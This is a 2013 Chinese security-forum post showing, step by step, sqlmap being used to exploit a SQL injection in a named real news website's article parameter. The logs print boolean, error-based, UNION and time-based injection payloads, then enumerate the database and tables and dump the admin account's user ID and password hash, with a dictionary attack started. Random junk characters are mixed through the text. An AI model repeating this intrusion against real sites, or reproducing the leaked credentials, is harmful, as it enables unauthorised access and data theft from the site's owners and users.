找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2306|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 x" ?3 ^* Q3 M( n$ h1 Rms "Mysql" --current-user       /*  注解:获取当前用户名称  R- B+ z4 [3 D# T/ r8 P  B
    sqlmap/0.9 - automatic SQL injection and database takeover tool9 X; J* k5 T, ~5 n  _2 M. \
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    0 B- ^3 @% \- c' S3 E[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    0 {: d* {% D3 D9 ~3 a" X- z# S session file% H4 p7 H4 j$ V/ o# w
    [16:53:54] [INFO] resuming injection data from session file, h& }, F2 i! Y1 r
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ' a# m$ ^6 x# ~% x0 U[16:53:54] [INFO] testing connection to the target url
    ; |1 m2 E- c: O1 \2 t9 c, [sqlmap identified the following injection points with a total of 0 HTTP(s) reque* D$ _; B$ w! h0 p) V3 X
    sts:# J8 G6 O& u7 x7 C: Z! e
    ---( N2 s) d" J0 x. Z: t( W% S9 m( P
    Place: GET
    2 F! C. R; O' G& V9 a- G7 jParameter: id. T1 N8 t4 g6 Y
        Type: boolean-based blind/ l: C( X5 G" @6 U5 H/ d* {
        Title: AND boolean-based blind - WHERE or HAVING clause
    ! p6 O8 j; x7 M. F, Z1 h0 z( F: y8 K    Payload: id=276 AND 799=799) v& h2 k) V: X
        Type: error-based4 w1 j+ O2 n+ V( R' R* i1 H
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% u; N4 {' ^! k
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    . b% M) B* f6 k! ]: o. T- r. {1 o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ) |0 l( G* }/ N4 M- F# K),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), ^! c% v3 h9 Z& ~1 \
        Type: UNION query
    : {) u1 l% m. z% t7 e    Title: MySQL UNION query (NULL) - 1 to 10 columns3 S  f! |$ L$ `. H) h7 b4 [! H( l
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 _' }1 c' U$ x/ X' J* T( U* Y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    2 c& J0 ~) _6 v( ~  hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    $ c( m. g% Y5 m1 Q3 X7 J+ z    Type: AND/OR time-based blind
    ) `1 ~  Y$ U- R* \8 V    Title: MySQL > 5.0.11 AND time-based blind/ r$ p% r5 y6 v! @
        Payload: id=276 AND SLEEP(5)
    , |2 m$ O0 c- ?8 u$ ^---8 |: O+ j. d4 J6 M
    [16:53:55] [INFO] the back-end DBMS is MySQL- k8 F! o- {* |, e5 f; {+ h' ]
    web server operating system: Windows' w* t% c0 C3 j! p
    web application technology: Apache 2.2.11, PHP 5.3.07 E( I- `+ O$ ~5 U! ~
    back-end DBMS: MySQL 5.0! a' C: Q: U0 ~( K) _. c; c
    [16:53:55] [INFO] fetching current user1 X0 ?" e) b2 r, Q
    current user:    'root@localhost'   
    ! W6 T) N1 E/ Z/ A4 x[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    6 t, J5 y  o2 ^( Ttput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    9 P8 t  B# g6 E1 h1 Q8 t1 P4 k# q+ K% ?; L
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # y* a% y! w, I' i! R8 c* ^ms "Mysql" --current-db                  /*当前数据库
    0 b6 t7 w( {& R( H% D) D    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ' \2 j$ r; v5 _# c    http://sqlmap.sourceforge.net
  • starting at: 16:54:16( e+ X0 ]4 ?! Q6 w) o% b* ?
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" [$ X/ D: M3 r, q( A
    session file
    . T; F. {; A; d% Z[16:54:16] [INFO] resuming injection data from session file' _3 u, ?: J' ~# V
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file8 u) s5 B$ o, |! G2 e/ K. X
    [16:54:16] [INFO] testing connection to the target url
      y, I5 r/ e. Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 ^5 d& D3 F$ g( Hsts:
    9 ?4 l6 a+ h3 |. [---: o( V  P3 a1 D- L3 q! u- q' ~0 O
    Place: GET
    6 [1 v+ r' V6 ]" c+ XParameter: id
    5 Q  w' Q- m/ b: q  X. l7 ^    Type: boolean-based blind9 d# d' }  Q, }8 W
        Title: AND boolean-based blind - WHERE or HAVING clause
    ! M) \# C! X- U" T/ X! w( b' e    Payload: id=276 AND 799=799
    / e4 A- O# P/ v# E1 D    Type: error-based, H3 C' ], m# C
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ; Q7 ]4 w4 V: s; d# ^, T    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 \6 U  ]2 e( A7 l1 \( \120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    / v' p( I+ ?1 |& z! q/ l5 A/ g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)  s* I2 F# S. G+ g! G
        Type: UNION query
    3 l3 d, [) [5 u& y" v    Title: MySQL UNION query (NULL) - 1 to 10 columns
    : l7 T/ R: H* p  N. X' `    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    2 {8 G4 b# P- u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    8 I* b# A8 i  u8 ~  H! x, v! ~1 e2 CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 `1 m: c  Z# a% D7 E! D
        Type: AND/OR time-based blind
    $ I: u& {0 |2 V# Z4 \3 @) R+ [    Title: MySQL > 5.0.11 AND time-based blind+ m2 N* E( f' [* _
        Payload: id=276 AND SLEEP(5)
    8 o, f( g8 U$ S# }. h. _8 \0 K---- D1 d4 Z- s( S0 ^$ K5 U) Z
    [16:54:17] [INFO] the back-end DBMS is MySQL
    ( i- y+ v  T+ P5 L9 Wweb server operating system: Windows( o( |9 W( T, x
    web application technology: Apache 2.2.11, PHP 5.3.09 v9 Z' ]1 F* q
    back-end DBMS: MySQL 5.0
    5 |# f2 q- P$ _& t$ m* b[16:54:17] [INFO] fetching current database5 Z+ s: w2 F" _# [" \
    current database:    'wepost'0 H; g9 u( c' p1 g
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou! T- h  u! P. z/ K: x) |6 F
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18$ p% A, b4 F8 [2 A
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    7 l# s2 n; O, Y% ?2 n% ~2 g# s$ J  jms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    5 F- \% ^. w1 e. i) B1 b* ]2 h    sqlmap/0.9 - automatic SQL injection and database takeover tool
    1 K) b: k  e6 @& _- j: S    http://sqlmap.sourceforge.net
  • starting at: 16:55:25! n1 z1 s- O" f2 O9 U& P
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as. R/ R, s; k  D' g# C' M
    session file! h  T& W9 i) V- ]3 K
    [16:55:25] [INFO] resuming injection data from session file
    ! t4 }4 f" G5 p/ G$ k9 {[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    # ^$ r% c& a2 \6 l0 U. F[16:55:25] [INFO] testing connection to the target url5 v5 j# E- @+ M1 r8 r% N8 c
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque; ^. ~, a+ O- `7 E$ a1 r
    sts:. h3 F- q- l: n" F3 K
    ---; s, ]# R4 W: `
    Place: GET% x) F, J8 u) C- u  A, \
    Parameter: id8 L8 f) z# I: m6 Q
        Type: boolean-based blind
    8 ^( }* k+ d% D3 F    Title: AND boolean-based blind - WHERE or HAVING clause4 `' L9 u6 w& ?7 v7 L3 Y. @- m4 T% y
        Payload: id=276 AND 799=799
    $ e% c, y% i8 v- T) l0 Y    Type: error-based7 @! X2 V/ L8 S
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! y2 {0 N; H5 ?7 D: f: a. [
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 z. r2 _0 [5 l7 `  g
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ J! D) \3 A# a1 G% o  o4 {8 b6 f
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): e2 U1 p' V, Q6 S' [
        Type: UNION query6 x; @- l7 C9 T7 c6 z  N5 g6 S1 j$ F
        Title: MySQL UNION query (NULL) - 1 to 10 columns; w7 p$ h* h5 o7 @- f( ^8 e
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    # I. J7 _7 u! u# V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    9 E- p! T. h1 |. ?8 Y5 z  xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    # \2 n$ v! O  D2 N  {    Type: AND/OR time-based blind
    5 @4 x/ {$ w3 a0 M' Q    Title: MySQL > 5.0.11 AND time-based blind
    5 a* H& k5 u  {* w, o    Payload: id=276 AND SLEEP(5)5 _1 f9 X. e, R8 E: H$ R( ^
    ---
    9 F) U# W5 L5 X& {[16:55:26] [INFO] the back-end DBMS is MySQL
    % Z  u; Q9 j8 _1 G3 f6 sweb server operating system: Windows# E) s. R; Z9 f% ?# Y
    web application technology: Apache 2.2.11, PHP 5.3.03 d6 e3 [+ E6 u7 U+ M* C/ R
    back-end DBMS: MySQL 5.0
    ) p1 U7 M0 o2 z) l  ]" z[16:55:26] [INFO] fetching tables for database 'wepost'
    7 c- @% k. s  w5 [9 V6 Z+ X+ k[16:55:27] [INFO] the SQL query used returns 6 entries
    ( f( Y( L5 B! v+ qDatabase: wepost
    ( O) p0 Y: w/ Q( s& ^* ]+ O[6 tables]! A& A; v2 h$ H7 \0 s$ Y5 q7 f9 y
    +-------------+
    5 {& [. z% T6 y) z$ t1 o4 T0 Z| admin       |" n. N2 U/ x( _  J' a( `3 R0 Q
    | article     |- w1 b, {' o/ L0 E* W; \
    | contributor |0 e; r$ ?! h4 ^- ^- v9 G" e
    | idea        |* M, T5 }3 o; s- u) x
    | image       |
    8 k3 \% f3 V, c| issue       |
    0 v7 M) j2 y/ W& s+-------------+
    ; n+ g; r- i8 {5 |3 ~5 \[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 v% z8 }% z( p9 U: Z& \
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
      }& W# {% e* i
    ! r! }- V9 f; T: F& ~* `D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, Q/ K# p8 m# a
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名# |# ]5 H9 v' W( v* h! e
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    0 ^. T/ m  L0 B+ J) n+ i% \8 K    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    ( k$ |9 }9 L1 ~$ L4 B8 G- E, Wsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ; `8 @3 c. `' o* g- T  Qsts:
    2 Z* {( |6 `; u4 Y---
    + {- k( g) k  h5 YPlace: GET
    2 C% ~$ x3 I7 r( N0 G9 CParameter: id
    6 r: X' a3 Q* q: `9 ^) |! T- m    Type: boolean-based blind
    * G- c$ w+ W5 C! b) e1 O    Title: AND boolean-based blind - WHERE or HAVING clause$ B6 s7 R% x' E  [# q+ w: i
        Payload: id=276 AND 799=799& ]+ |1 A( p( A3 Q: e1 H' {$ y
        Type: error-based. P+ Q6 N. V/ f2 C( h8 d' \$ M
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    1 Y7 X, N0 `$ e; _8 d- w    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ' Y! t  `$ S8 j  [3 k# f: t6 o% [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    + m3 _$ r, b* k/ K+ f" e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    $ \6 M, w! P0 U/ [) X  q/ n    Type: UNION query5 ]9 `- g9 i) |9 H; Y1 E, Y
        Title: MySQL UNION query (NULL) - 1 to 10 columns& J( Z- M  \* w+ ^& Z( e
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# d& z+ E7 M9 j- n* [0 y5 |( S' C
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; `8 c. _7 J# H* [! J
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
      H) i3 G- ^) Z5 D    Type: AND/OR time-based blind- Y; u7 r' n6 f! S5 D9 [' h% _1 e
        Title: MySQL > 5.0.11 AND time-based blind' ~1 D0 m1 P! l5 \9 D2 e8 ?  d0 B
        Payload: id=276 AND SLEEP(5)" _+ h0 Y7 m. a. t$ B
    ---
    8 F) I0 ^5 y' Z6 g1 kweb server operating system: Windows
    : G4 N# B4 W3 Uweb application technology: Apache 2.2.11, PHP 5.3.0
    * ~; c  S5 Y' Q- F" X% gback-end DBMS: MySQL 5.0
    ; F, F* V* r4 p4 _! z4 Y- N( z5 P: T[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se7 Z* N! b& Z& g$ {$ b/ q; q7 n: F" |
    ssion': wepost, wepost5 X1 j0 _/ f$ e
    Database: wepost) v8 F4 b- L" J/ [
    Table: admin! @. N1 O8 i$ D) w) D+ }* z
    [4 columns]$ _8 ~/ O' X. f  K* t" X
    +----------+-------------+! g. t/ D: s* X: q! y/ e
    | Column   | Type        |
    ( G4 b: n6 j4 B5 X! s3 t+----------+-------------+# T5 u: C* O6 f
    | id       | int(11)     |$ N" ^/ `% {' b; K' ~3 |+ ^
    | password | varchar(32) |7 H: X( M4 ?1 l3 n  L
    | type     | varchar(10) |
    6 p! l4 C! h. N6 w9 C| userid   | varchar(20) |, @4 s2 B' O% w6 a" U/ X; x
    +----------+-------------+
    9 z+ r- g) T  m$ t3 f* o6 |% {
  • shutting down at: 16:56:19
    " j0 c8 ~/ `  s# s9 z! N. C& ~! x+ j3 R, ~3 Q/ V
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) c9 u3 I9 }  v" l% y# C0 y* Y
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容. v7 W) ]2 G) L" c& ^' z. w- G
        sqlmap/0.9 - automatic SQL injection and database takeover tool
      }4 O, ]% \( @, W8 D$ N; m+ H    http://sqlmap.sourceforge.net
  • starting at: 16:57:14' l. I* f: `" X. A
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque' l! J" z2 F0 A4 [3 w; D
    sts:
    % P% P( ~) ?0 v* j: |---- s4 W, \% w- G
    Place: GET' D( `4 C7 {  o; ~: ?1 q# A- I
    Parameter: id
    4 ^2 X: D# n+ x  B0 j    Type: boolean-based blind2 g9 f# R) [3 g' a
        Title: AND boolean-based blind - WHERE or HAVING clause& I& P: V( e; Z1 c  E$ `2 d
        Payload: id=276 AND 799=799
    4 Y+ A2 i0 d, |( g, Q    Type: error-based
    ' G6 }& X4 D9 |2 C% k* f6 D$ ]    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    $ L1 Z/ k' {9 k0 Y    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    : G7 d0 i# q; S: n) Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    8 p# O' X4 u& D2 z* _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    6 O$ W; H9 [9 ~0 v  }. G. C0 A. r    Type: UNION query
    & f- H6 e. l( y. B" `* o8 Q2 D: n    Title: MySQL UNION query (NULL) - 1 to 10 columns9 a) Z* R: D! f$ b! E6 C  x
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. E+ m, F$ L. T3 B/ x9 s# D/ t9 h
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! L( a7 R! ?& E. k* z7 {* X$ I
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 W5 e6 U4 n' L  c  ~
        Type: AND/OR time-based blind, u0 R. Z( V4 F! q: ?2 l
        Title: MySQL > 5.0.11 AND time-based blind, {% |" Q: L' x/ q4 Z" [5 ?
        Payload: id=276 AND SLEEP(5)3 B8 t5 v" _+ ^" u9 B1 y2 r+ U
    ---& b* S% p: O: ^* l
    web server operating system: Windows
    9 I! ?& Z8 V; Y3 l$ jweb application technology: Apache 2.2.11, PHP 5.3.0
    + a* H* [$ w, I1 a3 g+ c+ jback-end DBMS: MySQL 5.01 r/ q- r) P/ \
    recognized possible password hash values. do you want to use dictionary attack o
    , t* r! g; `: ~* Z( ln retrieved table items? [Y/n/q] y
    & n$ P8 j* ^2 l8 x3 Lwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]" D& W) B) z) k. b% n" s$ B
    do you want to use common password suffixes? (slow!) [y/N] y- W/ Y' m, s6 |3 u& @. e' ~
    Database: wepost
    $ R& `, p7 [0 T6 |& `Table: admin
    ' `$ \% N7 v, F6 N" y: m[1 entry]
    / e+ z$ D8 A- r; S8 t! \+----------------------------------+------------+
    3 ]! m- W1 {1 `- q& O" v9 H$ n5 U| password                         | userid     |
    7 X% g! D0 S& d+----------------------------------+------------+
      a% V3 N4 f2 k# C0 s" O6 b| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    ! Q& g3 N; [6 y' k& d* e+----------------------------------+------------+$ P" X! r7 C8 g- }$ A/ ~& G
  • shutting down at: 16:58:14- a( F4 r+ ]8 b
    % f$ S9 ^% H# K' q" |" ?
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表